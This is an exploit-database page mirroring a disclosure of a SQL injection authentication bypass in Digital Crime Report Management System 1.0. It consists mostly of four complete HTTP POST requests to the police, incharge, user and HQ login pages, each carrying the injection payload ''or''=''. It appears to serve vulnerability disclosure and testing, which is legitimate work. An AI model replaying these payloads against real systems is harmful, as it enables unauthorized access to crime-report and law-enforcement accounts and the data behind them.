Digital Crime Report Management System 1.0 SQL Injection
CVE
Category
Price
Severity
CVE-2020-26977
CWE-89
Not disclosed
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2021-04-15
CPE
cpe:cpe:/a:digital_crime_report_management_system:1.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040085 Below is a copy:
Digital Crime Report Management System 1.0 SQL Injection # Exploit Title: Digital Crime Report Management System 1.0 - SQL Injection (Authentication Bypass)
# Date: 13 April 2021
# Exploit Author: Galuh Muhammad Iman Akbar (GaluhID)
# Vendor Homepage: https://iwantsourcecodes.com/digital-crime-report-management-system-in-php-with-source-code/
# Software Link: https://iwantfilemanager.com/?dl=b48d951cbdd50568b031aab3b619fed2
I Found SQL Injection in 4 Page Login (Police Login page, Incharge Login page, User Login & HQ Login)
*Police Login page*
POST /digital-cyber-crime-report/policelogin.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://192.168.1.14
Connection: close
Referer: http://192.168.1.14/digital-cyber-crime-report/policelogin.php
Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
Upgrade-Insecure-Requests: 1
email='or''='&password='or''='&s=
*Incharge Login*
POST /digital-cyber-crime-report/inchargelogin.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://192.168.1.14
Connection: close
Referer: http://192.168.1.14/digital-cyber-crime-report/inchargelogin.php
Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
Upgrade-Insecure-Requests: 1
email='or''='&password='or''='&s=
*User Login*
POST /digital-cyber-crime-report/userlogin.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: http://192.168.1.14
Connection: close
Referer: http://192.168.1.14/digital-cyber-crime-report/userlogin.php
Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
Upgrade-Insecure-Requests: 1
email=imanakbar1000%40gmail.com&password='or''='&s=
*HQ Login*
POST /digital-cyber-crime-report/headlogin.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: http://192.168.1.14
Connection: close
Referer: http://192.168.1.14/digital-cyber-crime-report/headlogin.php
Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
Upgrade-Insecure-Requests: 1
email=imanakbar1000%40gmail.com&password='or''='&s=
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum